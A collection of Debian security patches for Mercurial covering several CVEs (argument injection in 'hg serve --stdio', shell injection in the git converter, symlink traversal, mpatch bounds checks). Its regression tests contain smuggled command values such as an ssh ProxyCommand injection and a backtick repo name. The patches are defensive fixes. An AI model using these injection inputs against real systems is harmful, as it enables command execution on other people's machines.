url: 'ssh://-oProxyCommand=touch owned@example.com/path' (in subrepo s) + [255] debian/patches/CVE-2017-9462.patch0000664000000000000000000001465113375561147013271 0ustar # HG changeset patch # User Augie Fackler # Date 1492021435 25200 # Node ID 77eaf9539499a1b8be259ffe7ada787d07857f80 # Parent 68f263f52d2e3e2798b4f1e55cb665c6b043f93b dispatch: protect against malicious 'hg serve --stdio' invocations (sec) Some shared-ssh installations assume that 'hg serve --stdio' is a safe command to run for minimally trusted users. Unfortunately, the messy implementation of argument parsing here meant that trying to access a repo named '--debugger' would give the user a pdb prompt, thereby sidestepping any hoped-for sandboxing. Serving repositories over HTTP(S) is unaffected. We're not currently hardening any subcommands other than 'serve'. If your service exposes other commands to users with arbitrary repository names, it is imperative that you defend against repository names of '--debugger' and anything starting with '--config'. The read-only mode of hg-ssh stopped working because it provided its hook configuration to "hg serve --stdio" via --config parameter. This is banned for security reasons now. This patch switches it to directly call ui.setconfig(). If your custom hosting infrastructure relies on passing --config to "hg serve --stdio", you'll need to find a different way to get that configuration into Mercurial, either by using ui.setconfig() as hg-ssh does in this patch, or by placing an hgrc file someplace where Mercurial will read it. mitrandir@fb.com provided some extra fixes for the dispatch code and for hg-ssh in places that I overlooked. diff -r 68f263f52d2e -r 77eaf9539499 contrib/hg-ssh --- a/contrib/hg-ssh Mon Apr 03 17:34:24 2017 -0400 +++ b/contrib/hg-ssh Wed Apr 12 11:23:55 2017 -0700 @@ -32,7 +32,7 @@ command="hg-ssh --read-only repos/*" # enable importing on demand to reduce startup time from mercurial import demandimport; demandimport.enable() -from mercurial import dispatch +from mercurial import dispatch, ui as uimod import sys, os, shlex @@ -61,14 +61,15 @@ def main(): repo = os.path.normpath(os.path.join(cwd, os.path.expanduser(path))) if repo in allowed_paths: cmd = ['-R', repo, 'serve', '--stdio'] + req = dispatch.request(cmd) if readonly: - cmd += [ - '--config', - 'hooks.prechangegroup.hg-ssh=python:__main__.rejectpush', - '--config', - 'hooks.prepushkey.hg-ssh=python:__main__.rejectpush' - ] - dispatch.dispatch(dispatch.request(cmd)) + if not req.ui: + req.ui = uimod.ui() + req.ui.setconfig('hooks', 'prechangegroup.hg-ssh', + 'python:__main__.rejectpush', 'hg-ssh') + req.ui.setconfig('hooks', 'prepushkey.hg-ssh', + 'python:__main__.rejectpush', 'hg-ssh') + dispatch.dispatch(req) else: sys.stderr.write('Illegal repository "%s"\n' % repo) sys.exit(255) diff -r 68f263f52d2e -r 77eaf9539499 mercurial/dispatch.py --- a/mercurial/dispatch.py Mon Apr 03 17:34:24 2017 -0400 +++ b/mercurial/dispatch.py Wed Apr 12 11:23:55 2017 -0700 @@ -6,6 +6,7 @@ # GNU General Public License version 2 or any later version. from i18n import _ +import getopt import os, sys, atexit, signal, pdb, socket, errno, shlex, time, traceback, re import util, commands, hg, fancyopts, extensions, hook, error import cmdutil, encoding @@ -86,6 +87,37 @@ def _runcatch(req): except ValueError: pass # happens if called in a thread + realcmd = None + try: + cmdargs = fancyopts.fancyopts(req.args[:], commands.globalopts, {}) + cmd = cmdargs[0] + aliases, entry = cmdutil.findcmd(cmd, commands.table, False) + realcmd = aliases[0] + except (error.UnknownCommand, error.AmbiguousCommand, + IndexError, getopt.GetoptError): + # Don't handle this here. We know the command is + # invalid, but all we're worried about for now is that + # it's not a command that server operators expect to + # be safe to offer to users in a sandbox. + pass + if realcmd == 'serve' and '--stdio' in cmdargs: + # We want to constrain 'hg serve --stdio' instances pretty + # closely, as many shared-ssh access tools want to grant + # access to run *only* 'hg -R $repo serve --stdio'. We + # restrict to exactly that set of arguments, and prohibit + # any repo name that starts with '--' to prevent + # shenanigans wherein a user does something like pass + # --debugger or --config=ui.debugger=1 as a repo + # name. This used to actually run the debugger. + if (len(req.args) != 4 or + req.args[0] != '-R' or + req.args[1].startswith('--') or + req.args[2] != 'serve' or + req.args[3] != '--stdio'): + ui.warn(_("abort: potentially unsafe serve --stdio invocation: %r\n") % + (req.args,)) + return -1 + try: try: debugger = 'pdb' diff -r 68f263f52d2e -r 77eaf9539499 tests/test-ssh.t --- a/tests/test-ssh.t Mon Apr 03 17:34:24 2017 -0400 +++ b/tests/test-ssh.t Wed Apr 12 11:23:55 2017 -0700 @@ -291,6 +291,19 @@ Test (non-)escaping of remote paths with spaces when cloning (issue3145): abort: destination 'a repo' is not empty [255] +Make sure hg is really paranoid in serve --stdio mode. It used to be +possible to get a debugger REPL by specifying a repo named --debugger. + $ hg -R --debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] + [255] +Abbreviations of 'serve' also don't work, to avoid shenanigans. + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] + Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right parameters: --- a/tests/test-hup.t +++ b/tests/test-hup.t @@ -3,7 +3,7 @@ Test hangup signal in the middle of transaction $ "$TESTDIR/hghave" serve fifo || exit 80 $ hg init $ mkfifo p - $ hg serve --stdio < p 1>out 2>&1 & + $ hg -R . serve --stdio < p 1>out 2>&1 & $ P=$! Do test while holding fifo open debian/patches/CVE-2016-3069_part2.patch0000664000000000000000000001635713375253775014407 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID cdda7b96afff3433eafdeeb83ded83a5b25b7a5b # Parent 197eed39e3d5e9a8cadfd9ba5839eb14cc265caa convert: rewrite calls to Git to use the new shelling mechanism (SEC) CVE-2016-3069 (2/5) One test output changed because we were ignoring git return code in numcommits before. diff -r 197eed39e3d5 -r cdda7b96afff hgext/convert/git.py --- a/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 @@ -102,19 +102,19 @@ class convert_git(converter_source, commandline): def getheads(self): if not self.rev: - heads, ret = self.gitread('git rev-parse --branches --remotes') - heads = heads.splitlines() + output, status = self.gitrun('rev-parse', '--branches', '--remotes') + heads = output.splitlines() else: - heads, ret = self.gitread("git rev-parse --verify %s" % self.rev) - heads = [heads[:-1]] - if ret: + rawhead, ret = self.gitrun('rev-parse', '--verify', rev) + heads.append(rawhead[:-1]) + if status: raise util.Abort(_('cannot retrieve git heads')) return heads def catfile(self, rev, type): if rev == hex(nullid): raise IOError - data, ret = self.gitread("git cat-file %s %s" % (type, rev)) + data, ret = self.gitrun('cat-file', type, rev) if ret: raise util.Abort(_('cannot read %r object at %s') % (type, rev)) return data @@ -153,25 +153,27 @@ class convert_git(converter_source, commandline): self.submodules.append(submodule(s['path'], '', s['url'])) def retrievegitmodules(self, version): - modules, ret = self.gitread("git show %s:%s" % (version, '.gitmodules')) + modules, ret = self.gitrun('show','%s:%s' % (version, '.gitmodules')) if ret: raise util.Abort(_('cannot read submodules config file in %s') % version) self.parsegitmodules(modules) for m in self.submodules: - node, ret = self.gitread("git rev-parse %s:%s" % (version, m.path)) + node, ret = self.gitrun('rev-parse', '%s:%s' % (version, m.path)) if ret: continue m.node = node.strip() def getchanges(self, version): self.modecache = {} - fh = self.gitopen("git diff-tree -z --root -m -r %s" % version) + output, status = self.gitrun('diff-tree', '-z', '--root', '-m', '-r', version) + if status: + raise util.Abort(_('cannot read changes in %s') % version) changes = [] seen = set() entry = None subexists = False - for l in fh.read().split('\x00'): + for l in output.split('\x00'): if not entry: if not l.startswith(':'): continue @@ -194,8 +196,6 @@ class convert_git(converter_source, commandline): self.modecache[(f, h)] = (p and "x") or (s and "l") or "" changes.append((f, h)) entry = None - if fh.close(): - raise util.Abort(_('cannot read changes in %s') % version) if subexists: self.retrievegitmodules(version) @@ -240,12 +240,14 @@ class convert_git(converter_source, commandline): def gettags(self): tags = {} alltags = {} - fh = self.gitopen('git ls-remote --tags "%s"' % self.path, - err=subprocess.STDOUT) + output, status = self.gitrunlines('ls-remote', '--tags', self.path) + + if status: + raise util.Abort(_('cannot read tags from %s') % self.path) prefix = 'refs/tags/' # Build complete list of tags, both annotated and bare ones - for line in fh: + for line in output: line = line.strip() if line.startswith("error:") or line.startswith("fatal:"): raise util.Abort(_('cannot read tags from %s') % self.path) @@ -253,8 +255,6 @@ class convert_git(converter_source, commandline): if not tag.startswith(prefix): continue alltags[tag[len(prefix):]] = node - if fh.close(): - raise util.Abort(_('cannot read tags from %s') % self.path) # Filter out tag objects for annotated tag refs for tag in alltags: @@ -271,18 +271,22 @@ class convert_git(converter_source, commandline): def getchangedfiles(self, version, i): changes = [] if i is None: - fh = self.gitopen("git diff-tree --root -m -r %s" % version) - for l in fh: + output, status = self.gitrunlines('diff-tree', '--root', '-m', + '-r', version) + if status: + raise util.Abort(_('cannot read changes in %s') % version) + for l in output: if "\t" not in l: continue m, f = l[:-1].split("\t") changes.append(f) else: - fh = self.gitopen('git diff-tree --name-only --root -r %s ' - '"%s^%s" --' % (version, version, i + 1)) - changes = [f.rstrip('\n') for f in fh] - if fh.close(): - raise util.Abort(_('cannot read changes in %s') % version) + output, status = self.gitrunlines('diff-tree', '--name-only', + '--root', '-r', version, + '%s^%s' % (version, i + 1), '--') + if status: + raise util.Abort(_('cannot read changes in %s') % version) + changes = [f.rstrip('\n') for f in output] return changes @@ -294,14 +298,14 @@ class convert_git(converter_source, commandline): prefixlen = len(prefix) # factor two commands - gitcmd = { 'remote/': 'git ls-remote --heads origin', - '': 'git show-ref'} + gitcmd = { 'remote/': ['ls-remote', '--heads', 'origin'], + '': ['show-ref']} # Origin heads for reftype in gitcmd: try: - fh = self.gitopen(gitcmd[reftype], err=subprocess.PIPE) - for line in fh: + output, status = self.gitrunlines(*gitcmd[reftype]) + for line in output: line = line.strip() rev, name = line.split(None, 1) if not name.startswith(prefix): --- a/tests/test-convert-git.t +++ b/tests/test-convert-git.t @@ -374,8 +374,11 @@ cd ../../.. damage git repository by renaming a commit object $ COMMIT_OBJ=1c/0ce3c5886f83a1d78a7b517cdff5cf9ca17bdd $ mv git-repo4/.git/objects/$COMMIT_OBJ git-repo4/.git/objects/$COMMIT_OBJ.tmp - $ hg convert git-repo4 git-repo4-broken-hg 2>&1 | grep 'abort:' - abort: cannot read tags from git-repo4/.git + $ hg convert git-repo4 git-repo4-broken-hg + initializing destination git-repo4-broken-hg repository + scanning source... + sorting... + converting... $ mv git-repo4/.git/objects/$COMMIT_OBJ.tmp git-repo4/.git/objects/$COMMIT_OBJ damage git repository by renaming a blob object debian/patches/CVE-2016-3069_part1.patch0000664000000000000000000000451313373604032014355 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID 197eed39e3d5e9a8cadfd9ba5839eb14cc265caa # Parent 34d43cb85de8d06764039d8868eee19d00fddeab convert: add new, non-clowny interface for shelling out to git (SEC) CVE-2016-3069 (1/5) To avoid shell injection and for the sake of simplicity let's use the common.commandline for calling git. diff -r 34d43cb85de8 -r 197eed39e3d5 hgext/convert/git.py --- a/hgext/convert/git.py Sun Mar 20 21:52:21 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 @@ -11,7 +11,7 @@ from mercurial import util, config from mercurial.node import hex, nullid from mercurial.i18n import _ -from common import NoRepo, commit, converter_source, checktool +from common import NoRepo, commit, converter_source, checktool, commandline class submodule(object): def __init__(self, path, node, url): @@ -25,7 +25,7 @@ class submodule(object): def hgsubstate(self): return "%s %s" % (self.node, self.path) -class convert_git(converter_source): +class convert_git(converter_source, commandline): # Windows does not support GIT_DIR= construct while other systems # cannot remove environment variable. Just assume none have # both issues. @@ -56,6 +56,21 @@ class convert_git(converter_source): else: return util.popen('GIT_DIR=%s %s' % (self.path, s), 'rb') + def _gitcmd(self, cmd, *args, **kwargs): + return cmd('--git-dir=%s' % self.path, *args, **kwargs) + + def gitrun0(self, *args, **kwargs): + return self._gitcmd(self.run0, *args, **kwargs) + + def gitrun(self, *args, **kwargs): + return self._gitcmd(self.run, *args, **kwargs) + + def gitrunlines0(self, *args, **kwargs): + return self._gitcmd(self.runlines0, *args, **kwargs) + + def gitrunlines(self, *args, **kwargs): + return self._gitcmd(self.runlines, *args, **kwargs) + def popen_with_stderr(self, s): p = subprocess.Popen(s, shell=True, bufsize=-1, close_fds=util.closefds, @@ -73,6 +88,7 @@ class convert_git(converter_source): def __init__(self, ui, path, rev=None): super(convert_git, self).__init__(ui, path, rev=rev) + commandline.__init__(self, ui, 'git') if os.path.isdir(path + "/.git"): path += "/.git" debian/patches/CVE-2017-17458_part2.patch0000664000000000000000000000525013373604311014445 0ustar # HG changeset patch # User Yuya Nishihara # Date 1509707570 -32400 # Node ID 071cbeba421217d722a69a5d614ec934684d62d5 # Parent 80d7dbda92940c49e0fd66230ae07cd526b3629c subrepo: disallow symlink traversal across subrepo mount point (SEC) It wasn't easy to extend the pathauditor to check symlink traversal across subrepos because pathauditor._checkfs() rejects a directory having ".hg" directory. That's why I added the explicit islink() check. No idea if this patch is necessary after we've fixed the issue5730 by splitting submerge() into planning and execution phases. diff -r 80d7dbda9294 -r 071cbeba4212 mercurial/subrepo.py --- a/mercurial/subrepo.py Fri Nov 03 19:17:25 2017 +0900 +++ b/mercurial/subrepo.py Fri Nov 03 20:12:50 2017 +0900 @@ -334,6 +334,12 @@ def itersubrepos(ctx1, ctx2): for subpath, ctx in sorted(subpaths.iteritems()): yield subpath, ctx.sub(subpath) +def _auditsubrepopath(repo, path): + # auditor doesn't check if the path itself is a symlink + scmutil.pathauditor(repo.root)(path) + if repo.wvfs.islink(path): + raise error.Abort(_("subrepo '%s' traverses symbolic link") % path) + def subrepo(ctx, path): """return instance of the right subrepo class for subrepo in path""" # subrepo inherently violates our import layering rules @@ -344,7 +350,7 @@ def subrepo(ctx, path): import hg as h hg = h - scmutil.pathauditor(ctx._repo.root)(path) + _auditsubrepopath(ctx._repo, path) state = ctx.substate[path] if state[2] not in types: raise util.Abort(_('unknown subrepo type %s') % state[2]) diff -r 80d7dbda9294 -r 071cbeba4212 tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t Fri Nov 03 19:17:25 2017 +0900 +++ b/tests/test-audit-subrepo.t Fri Nov 03 20:12:50 2017 +0900 @@ -50,17 +50,35 @@ on commit: $ hg ci -qAm 'add symlink "out"' $ hg init ../out $ echo 'out = out' >> .hgsub -BROKEN: should fail $ hg ci -qAm 'add subrepo "out"' + abort: subrepo 'out' traverses symbolic link + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "out"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +out = out + > diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + > @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 out + > EOF $ cd ../.. on clone (and update): $ mkdir hgsymdir2 -BROKEN: should fail to update $ hg clone -q hgsymdir/root hgsymdir2/root + abort: subrepo 'out' traverses symbolic link + [255] $ ls hgsymdir2 - out root #endif debian/patches/deb_specific__fix_hg-ssh_interpreter.patch0000664000000000000000000000110712230221467021136 0ustar Author: Javi Merino Description: Fix python interpreter for hg-ssh hg-ssh is installed by dh_install instead of setup.py, so it's interpreter is not fixed automatically for us. System-wide commands should use /usr/bin/python as the Debian Python Policy recommends. Bug-Debian: http://bugs.debian.org/654925 Bug-Ubuntu: https://bugs.launchpad.net/bugs/912625 Forwarded: not-needed --- a/contrib/hg-ssh +++ b/contrib/hg-ssh @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/python # # Copyright 2005-2007 by Intevation GmbH # debian/patches/CVE-2016-3630_part2.patch0000664000000000000000000000155113373604123014350 0ustar # HG changeset patch # User Matt Mackall # Date 1458174626 25200 # Node ID b9714d958e89cd6ff1da46b46f39076c03325ac7 # Parent b6ed2505d6cf1d73f7f5c62e7369c4ce65cd3732 parsers: detect short records (SEC) CVE-2016-3630 (2/2) This addresses part of a vulnerability in binary delta application. diff -r b6ed2505d6cf -r b9714d958e89 mercurial/mpatch.c --- a/mercurial/mpatch.c Wed Mar 16 17:29:29 2016 -0700 +++ b/mercurial/mpatch.c Wed Mar 16 17:30:26 2016 -0700 @@ -215,10 +215,10 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); - if (lt->start > lt->end) - break; /* sanity check */ lt->data = bin + pos + 12; pos += 12 + lt->len; + if (lt->start > lt->end || lt->len < 0) + break; /* sanity check */ lt++; } debian/patches/CVE-2018-13347.patch0000664000000000000000000000214013373604440013325 0ustar # HG changeset patch # User Augie Fackler # Date 1524895496 14400 # Node ID 1acfc35d478cdae60cf62c6f07fa6b6ad3070ea7 # Parent 90a274965de74cb0b4bea01a564b29b12a6af814 mpatch: protect against underflow in mpatch_apply (SEC) Also caught by oss-fuzz fuzzer during development. This defect is OVE-20180430-0002 or CVE-2018-13347. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -263,7 +263,7 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) char *p = buf; while (f != l->tail) { - if (f->start < last || f->end > len) { + if (f->start < last || f->end > len || last < 0) { if (!PyErr_Occurred()) PyErr_SetString(mpatch_Error, "invalid patch"); @@ -276,6 +276,12 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) p += f->len; f++; } + if (last < 0) { + if (!PyErr_Occurred()) + PyErr_SetString(mpatch_Error, + "invalid patch"); + return 0; + } memcpy(p, orig + last, len - last); return 1; } debian/patches/proposed_upstream__correct-zeroconf-doc0000664000000000000000000000121612230221473020557 0ustar Correct the documentation for the zeroconf extension. --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py @@ -7,9 +7,9 @@ '''discover and advertise repositories on the local network -Zeroconf-enabled repositories will be announced in a network without -the need to configure a server or a service. They can be discovered -without knowing their actual IP address. +The zeroconf extension will advertise :hg:`serve` instances over +DNS-SD so that they can be discovered using the :hg:`paths` command +without knowing the server's address. To allow other people to discover your repository using run :hg:`serve` in your repository:: debian/patches/CVE-2017-1000115.patch0000664000000000000000000002323613375307467013476 0ustar Description: symlink traversal fix for CVE-2017-1000115 This is a backport of two upstream patches from "stable" released as part of 4.3.1. Some interpretation was necessary for the patch to apply at all, but it is believed all use cases are covered, as the upstream-provided tests pass. One tests for the `files` command was removed as the command doesn't exist in 2.2.2. Author: Antoine Beaupré Bug-Debian: https://bugs.debian.org/871709 Origin: upstream, https://www.mercurial-scm.org/repo/hg/rev/47ea28293d30 and https://www.mercurial-scm.org/repo/hg/rev/377e8ddaebef Forwarded: not-needed Last-Update: 2017-08-28 --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -2063,7 +2063,7 @@ def revert(ui, repo, ctx, parents, *pats, **opts): fc = ctx[f] repo.wwrite(f, fc.data(), fc.flags()) - audit_path = scmutil.pathauditor(repo.root) + audit_path = scmutil.pathauditor(repo.root, cached=True) for f in remove[0]: if repo.dirstate[f] == 'a': repo.dirstate.drop(f) --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -736,7 +736,7 @@ class dirstate(object): # unknown == True means we walked the full directory tree above. # So if a file is not seen it was either a) not matching matchfn # b) ignored, c) missing, or d) under a symlink directory. - audit_path = scmutil.pathauditor(self._root) + audit_path = scmutil.pathauditor(self._root, cached=True) for nf in iter(visit): # Report ignored items in the dmap as long as they are not --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -166,8 +166,9 @@ class localrepository(object): self.root = self.wvfs.base self.path = self.wvfs.join(".hg") self.origroot = path - self.auditor = scmutil.pathauditor(self.root, self._checknested) - self.vfs = scmutil.vfs(self.path) + self.auditor = scmutil.pathauditor(self.root, self._checknested, + cached=True) + self.vfs = scmutil.vfs(self.path, cacheaudited=True) self.opener = self.vfs self.baseui = baseui self.ui = baseui.copy() @@ -238,7 +239,7 @@ class localrepository(object): if inst.errno != errno.ENOENT: raise - self.store = store.store(requirements, self.sharedpath, scmutil.vfs) + self.store = store.store(requirements, self.sharedpath, lambda base: scmutil.vfs(base, cacheaudited=True)) self.spath = self.store.path self.svfs = self.store.vfs self.sopener = self.svfs --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -122,12 +122,17 @@ class pathauditor(object): - traverses a symlink (e.g. a/symlink_here/b) - inside a nested repository (a callback can be used to approve some nested repositories, e.g., subrepositories) + + If 'cached' is set to True, audited paths and sub-directories are cached. + Be careful to not keep the cache of unmanaged directories for long because + audited paths may be replaced with symlinks. ''' - def __init__(self, root, callback=None): + def __init__(self, root, callback=None, cached=False): self.audited = set() self.auditeddir = set() self.root = root + self._cached = cached self.callback = callback if os.path.lexists(root) and not util.checkcase(root): self.normcase = util.normcase @@ -200,10 +205,11 @@ class pathauditor(object): parts.pop() normparts.pop() - self.audited.add(normpath) - # only add prefixes to the cache after checking everything: we don't - # want to add "foo/bar/baz" before checking if there's a "foo/.hg" - self.auditeddir.update(prefixes) + if self._cached: + self.audited.add(normpath) + # only add prefixes to the cache after checking everything: we don't + # want to add "foo/bar/baz" before checking if there's a "foo/.hg" + self.auditeddir.update(prefixes) def check(self, path): try: @@ -303,24 +309,28 @@ class vfs(abstractvfs): This class is used to hide the details of COW semantics and remote file access from higher level code. + 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or + (b) the base directory is managed by hg and considered sort-of append-only. + See pathutil.pathauditor() for details. ''' - def __init__(self, base, audit=True, expandpath=False, realpath=False): + def __init__(self, base, audit=True, expandpath=False, realpath=False, cacheaudited=False): if expandpath: base = util.expandpath(base) if realpath: base = os.path.realpath(base) self.base = base + self._cached = cacheaudited self._setmustaudit(audit) self.createmode = None self._trustnlink = None def _getmustaudit(self): return self._audit def _setmustaudit(self, onoff): self._audit = onoff if onoff: - self.audit = pathauditor(self.base) + self.audit = pathauditor(self.base, self._cached) else: self.audit = util.always @@ -778,7 +788,7 @@ def _interestingfiles(repo, matcher): This is different from dirstate.status because it doesn't care about whether files are modified or clean.''' added, unknown, deleted, removed = [], [], [], [] - audit_path = pathauditor(repo.root) + audit_path = pathauditor(repo.root, cached=True) ctx = repo[None] dirstate = repo.dirstate --- a/tests/test-audit-path.t +++ b/tests/test-audit-path.t @@ -90,3 +90,99 @@ attack /tmp/test [255] $ cd .. + +Test symlink traversal on merge: +-------------------------------- + +#if symlink + +set up symlink hell + + $ mkdir merge-symlink-out + $ hg init merge-symlink + $ cd merge-symlink + $ touch base + $ hg commit -qAm base + $ ln -s ../merge-symlink-out a + $ hg commit -qAm 'symlink a -> ../merge-symlink-out' + $ hg up -q 0 + $ mkdir a + $ touch a/poisoned + $ hg commit -qAm 'file a/poisoned' + $ hg log --template '{rev}: {desc}\n' + 2: file a/poisoned + 1: symlink a -> ../merge-symlink-out + 0: base + + +try trivial merge + + $ hg up -qC 1 + $ hg merge 2 + abort: path 'a/poisoned' traverses symbolic link 'a' + [255] + +try rebase onto other revision: cache of audited paths should be discarded, ++and the rebase should fail (issue5628) + + $ hg up -qC 2 + $ hg rebase -s 2 -d 1 --config extensions.rebase= + abort: path 'a/poisoned' traverses symbolic link 'a' + [255] + $ ls ../merge-symlink-out + + $ cd .. + +Test symlink traversal on update: +--------------------------------- + + $ mkdir update-symlink-out + $ hg init update-symlink + $ cd update-symlink + $ ln -s ../update-symlink-out a + $ hg commit -qAm 'symlink a -> ../update-symlink-out' + $ hg rm a + $ mkdir a && touch a/b + $ hg ci -qAm 'file a/b' a/b + $ hg up -qC 0 + $ hg rm a + $ mkdir a && touch a/c + $ hg ci -qAm 'rm a, file a/c' + $ hg log --template '{rev}: {desc}\n' + 2: rm a, file a/c + 1: file a/b + 0: symlink a -> ../update-symlink-out + + +try linear update where symlink already exists: + + $ hg up -qC 0 + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + + +try linear update including symlinked directory and its content: paths are +audited first by calculateupdates(), where no symlink is created so both +'a' and 'a/b' are taken as good paths. still applyupdates() should fail. + + $ hg up -qC null + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + $ ls ../update-symlink-out + +try branch update replacing directory with symlink, and its content: the +path 'a' is audited as a directory first, which should be audited again as +a symlink. + + $ rm -f a + $ hg up -qC 2 + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + $ ls ../update-symlink-out + + $ cd .. + +#endif --- a/tests/test-commandserver.py +++ b/tests/test-commandserver.py @@ -240,6 +240,30 @@ def hgignore(server): f.close() runcommand(server, ['status', '-i', '-u']) + +def symlink_hell(): + os.system("mkdir merge-symlink-out") + os.system("hg init merge-symlink") + os.chdir("merge-symlink") + os.system("touch base") + os.system("hg commit -qAm base") + os.system("ln -s ../merge-symlink-out a") + os.system("hg commit -qAm 'symlink a -> ../merge-symlink-out'") + os.system("hg up -q 0") + os.system("mkdir a") + os.system("touch a/poisoned") + os.system("hg commit -qAm 'file a/poisoned'") + + +def merge(server): + readchannel(server) + # audit a/poisoned as a good path + runcommand(server, ['up', '-qC', '2']) + runcommand(server, ['up', '-qC', '1']) + # here a is a symlink, so a/poisoned is bad + runcommand(server, ['merge', '2']) + + def phasecacheafterstrip(server): readchannel(server) @@ -285,3 +309,10 @@ if __name__ == '__main__': check(branch) check(hgignore) check(phasecacheafterstrip) + + symlink_hell() + os.system("hg up -q null") + check(merge) + if os.path.exists("../merge-symlink-out/poisoned"): + raise AssertionError('../merge-symlink-out/poisoned should not exist: server vulnerable to symlink traversal') + --- a/tests/test-commandserver.py.out +++ b/tests/test-commandserver.py.out @@ -191,3 +191,10 @@ o 0:eff892de26ec 5: public runcommand branches default 1:731265503d86 + +testing merge: + + runcommand up -qC 2 + runcommand up -qC 1 + runcommand merge 2 +abort: path 'a/poisoned' traverses symbolic link 'a' debian/patches/from_upstream__sshpeer_more_thorough_shell_quoting.patch0000664000000000000000000000212112540323345024306 0ustar Origin: http://selenic.com/hg/rev/e3f30068d2eb Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=783237 Description: sshpeer: more thorough shell quoting This fixes CVE-2014-9462 Applied-Upstream: 3.2.4 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -20,6 +20,8 @@ class remotelock(object): self.release() def _serverquote(s): + if not s: + return s '''quote a string for the remote shell ... which we assume is sh''' if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s): return s @@ -45,7 +47,10 @@ class sshpeer(wireproto.wirepeer): sshcmd = self.ui.config("ui", "ssh", "ssh") remotecmd = self.ui.config("ui", "remotecmd", "hg") - args = util.sshargs(sshcmd, self.host, self.user, self.port) + args = util.sshargs(sshcmd, + _serverquote(self.host), + _serverquote(self.user), + _serverquote(self.port)) if create: cmd = '%s %s %s' % (sshcmd, args, debian/patches/CVE-2016-3069_part3.patch0000664000000000000000000000352513373604067014371 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID b732e7f2aba4c4c417278c7c7488006301551855 # Parent cdda7b96afff3433eafdeeb83ded83a5b25b7a5b convert: dead code removal - old git calling functions (SEC) CVE-2016-3069 (3/5) diff -r cdda7b96afff -r b732e7f2aba4 hgext/convert/git.py --- a/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 @@ -29,32 +29,6 @@ class convert_git(converter_source, commandline): # Windows does not support GIT_DIR= construct while other systems # cannot remove environment variable. Just assume none have # both issues. - if util.safehasattr(os, 'unsetenv'): - def gitopen(self, s, err=None): - prevgitdir = os.environ.get('GIT_DIR') - os.environ['GIT_DIR'] = self.path - try: - if err == subprocess.PIPE: - (stdin, stdout, stderr) = util.popen3(s) - return stdout - elif err == subprocess.STDOUT: - return self.popen_with_stderr(s) - else: - return util.popen(s, 'rb') - finally: - if prevgitdir is None: - del os.environ['GIT_DIR'] - else: - os.environ['GIT_DIR'] = prevgitdir - else: - def gitopen(self, s, err=None): - if err == subprocess.PIPE: - (sin, so, se) = util.popen3('GIT_DIR=%s %s' % (self.path, s)) - return so - elif err == subprocess.STDOUT: - return self.popen_with_stderr(s) - else: - return util.popen('GIT_DIR=%s %s' % (self.path, s), 'rb') def _gitcmd(self, cmd, *args, **kwargs): return cmd('--git-dir=%s' % self.path, *args, **kwargs) debian/patches/CVE-2016-3069_part4.patch0000664000000000000000000000265713375254057014401 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458692847 25200 # Node ID ae279d4a19e9683214cbd1fe8298cf0b50571432 # Parent 80cac1de6aea89f9d068abb09b0ea58c70bd7130 convert: test for shell injection in git calls (SEC) CVE-2016-3069 (5/5) Before recent refactoring we were not escaping calls to git at all which made such injections possible. Let's have a test for that to avoid this problem in the future. Reported by Blake Burkhart. diff -r 80cac1de6aea -r ae279d4a19e9 tests/test-convert-git.t --- a/tests/test-convert-git.t Tue Mar 22 17:05:11 2016 -0700 +++ b/tests/test-convert-git.t Tue Mar 22 17:27:27 2016 -0700 @@ -393,3 +393,20 @@ damage git repository by renaming a tree object $ mv git-repo4/.git/objects/$TREE_OBJ git-repo4/.git/objects/$TREE_OBJ.tmp $ hg convert git-repo4 git-repo4-broken-hg 2>&1 | grep 'abort:' abort: cannot read changes in 1c0ce3c5886f83a1d78a7b517cdff5cf9ca17bdd + +test for escaping the repo name (CVE-2016-3069) + + $ git init '`echo pwned >COMMAND-INJECTION`' + Initialized empty 